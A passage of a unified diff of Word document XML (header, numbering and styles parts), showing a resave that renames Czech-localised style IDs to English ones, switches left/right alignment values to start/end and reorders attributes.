xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:hdr xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Zhlav"/>
-    </w:pPr>
+      <w:pStyle w:val="Header"/>
+      <w:spacing w:before="0" w:after="120"/>
+      <w:ind w:hanging="0"/>
+      <w:rPr/>
+    </w:pPr>
+    <w:r>
+      <w:rPr/>
+    </w:r>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="20FE5DA0"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="FDEAAAD8"/>
+<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+  <w:abstractNum w:abstractNumId="1">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis1"/>
+      <w:pStyle w:val="Heading1"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis2"/>
+      <w:pStyle w:val="Heading2"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis3"/>
+      <w:pStyle w:val="Heading3"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2.%3"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis4"/>
+      <w:pStyle w:val="Heading4"/>
       <w:suff w:val="space"/>
       <w:lvlText w:val="%1.%2.%3.%4"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="0"/>
         </w:tabs>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis5"/>
+      <w:pStyle w:val="Heading5"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1008"/>
         </w:tabs>
-        <w:ind w:left="1008" w:hanging="1008"/>
-      </w:pPr>
+        <w:ind w:start="1008" w:hanging="1008"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis6"/>
+      <w:pStyle w:val="Heading6"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1152"/>
         </w:tabs>
-        <w:ind w:left="1152" w:hanging="1152"/>
-      </w:pPr>
+        <w:ind w:start="1152" w:hanging="1152"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis7"/>
+      <w:pStyle w:val="Heading7"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1296"/>
         </w:tabs>
-        <w:ind w:left="1296" w:hanging="1296"/>
-      </w:pPr>
+        <w:ind w:start="1296" w:hanging="1296"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis8"/>
+      <w:pStyle w:val="Heading8"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1440"/>
         </w:tabs>
-        <w:ind w:left="1440" w:hanging="1440"/>
-      </w:pPr>
+        <w:ind w:start="1440" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Nadpis9"/>
+      <w:pStyle w:val="Heading9"/>
       <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1584"/>
         </w:tabs>
-        <w:ind w:left="1584" w:hanging="1584"/>
-      </w:pPr>
+        <w:ind w:start="1584" w:hanging="1584"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="684B658E"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="9CA87E64"/>
+  <w:abstractNum w:abstractNumId="2">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="Irodalomjegyzksor"/>
       <w:lvlText w:val="[%1]"/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1134"/>
         </w:tabs>
-        <w:ind w:left="1134" w:hanging="1134"/>
+        <w:ind w:start="1134" w:hanging="1134"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -2256,120 +1815,128 @@
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="1440"/>
         </w:tabs>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
+        <w:ind w:start="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
+      <w:lvlJc w:val="end"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="2160"/>
         </w:tabs>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
+        <w:ind w:start="2160" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="2880"/>
         </w:tabs>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
+        <w:ind w:start="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="3600"/>
         </w:tabs>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
+        <w:ind w:start="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
+      <w:lvlJc w:val="end"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="4320"/>
         </w:tabs>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
+        <w:ind w:start="4320" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="5040"/>
         </w:tabs>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
+        <w:ind w:start="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
+      <w:lvlJc w:val="start"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="5760"/>
         </w:tabs>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
+        <w:ind w:start="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
+      <w:lvlJc w:val="end"/>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="num" w:pos="6480"/>
         </w:tabs>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
+        <w:ind w:start="6480" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr/>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1" w16cid:durableId="344334010">
-    <w:abstractNumId w:val="0"/>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="707413594">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
+<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
         <w:lang w:val="hu-HU" w:eastAsia="hu-HU" w:bidi="ar-SA"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:suppressAutoHyphens/>
+        <w:suppressAutoHyphens w:val="true"/>
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
@@ -2438,7 +2005,7 @@
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1" w:uiPriority="99"/>
+    <w:lsdException w:name="Placeholder Text" w:uiPriority="99" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
     <w:lsdException w:name="Light List" w:uiPriority="61"/>
@@ -2460,7 +2027,7 @@
     <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
     <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
     <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1" w:uiPriority="99"/>
+    <w:lsdException w:name="Revision" w:uiPriority="99" w:semiHidden="1"/>
     <w:lsdException w:name="List Paragraph" w:uiPriority="34"/>
     <w:lsdException w:name="Quote" w:uiPriority="29"/>
     <w:lsdException w:name="Intense Quote" w:uiPriority="30"/>
@@ -2547,8 +2114,8 @@
     <w:lsdException w:name="Subtle Reference" w:uiPriority="31"/>
     <w:lsdException w:name="Intense Reference" w:uiPriority="32"/>
     <w:lsdException w:name="Book Title" w:uiPriority="33"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
     <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
     <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
@@ -2653,40 +2220,47 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Mention" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:uiPriority="99" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normln">
+  <w:style w:type="paragraph" w:styleId="Normal" w:default="1">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="000C3C29"/>
-    <w:pPr>
-      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
+    <w:rsid w:val="000c3c29"/>
+    <w:pPr>
+      <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
+      <w:bidi w:val="0"/>
+      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
       <w:ind w:firstLine="720"/>
       <w:jc w:val="both"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:color w:val="auto"/>
+      <w:kern w:val="0"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:val="en-US" w:eastAsia="en-US"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis1">
+      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:link w:val="Nadpis1Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00415288"/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:pageBreakBefore/>
       <w:numPr>
+        <w:ilvl w:val="0"/>
         <w:numId w:val="1"/>
       </w:numPr>
       <w:spacing w:before="360" w:after="480"/>
@@ -2701,15 +2275,15 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis2">
+  <w:style w:type="paragraph" w:styleId="Heading2">
     <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:link w:val="Nadpis2Char"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:numPr>
         <w:ilvl w:val="1"/>
         <w:numId w:val="1"/>
@@ -2726,14 +2300,14 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis3">
+  <w:style w:type="paragraph" w:styleId="Heading3">
     <w:name w:val="heading 3"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:numPr>
         <w:ilvl w:val="2"/>
         <w:numId w:val="1"/>
@@ -2749,14 +2323,14 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis4">
+  <w:style w:type="paragraph" w:styleId="Heading4">
     <w:name w:val="heading 4"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:numPr>
         <w:ilvl w:val="3"/>
         <w:numId w:val="1"/>
@@ -2770,10 +2344,10 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis5">
+  <w:style w:type="paragraph" w:styleId="Heading5">
     <w:name w:val="heading 5"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2792,10 +2366,10 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis6">
+  <w:style w:type="paragraph" w:styleId="Heading6">
     <w:name w:val="heading 6"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2812,10 +2386,10 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis7">
+  <w:style w:type="paragraph" w:styleId="Heading7">
     <w:name w:val="heading 7"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2825,11 +2399,12 @@
       <w:spacing w:before="240" w:after="60"/>
       <w:outlineLvl w:val="6"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis8">
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading8">
     <w:name w:val="heading 8"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2844,10 +2419,10 @@
       <w:iCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nadpis9">
+  <w:style w:type="paragraph" w:styleId="Heading9">
     <w:name w:val="heading 9"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:numPr>
@@ -2863,33 +2438,14 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="Standardnpsmoodstavce">
+  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
     <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="Bezseznamu">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="character" w:styleId="Hypertextovodkaz">
+    <w:qFormat/>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
     <w:uiPriority w:val="99"/>
     <w:rPr>
@@ -2897,37 +2453,38 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="slostrnky">
+  <w:style w:type="character" w:styleId="PageNumber">
     <w:name w:val="page number"/>
-    <w:basedOn w:val="Standardnpsmoodstavce"/>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharactersuser">
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="character" w:styleId="FootnoteCharactersuser" w:customStyle="1">
     <w:name w:val="Footnote Characters (user)"/>
     <w:semiHidden/>
     <w:qFormat/>
-    <w:rsid w:val="00B50CAA"/>
+    <w:rsid w:val="00b50caa"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
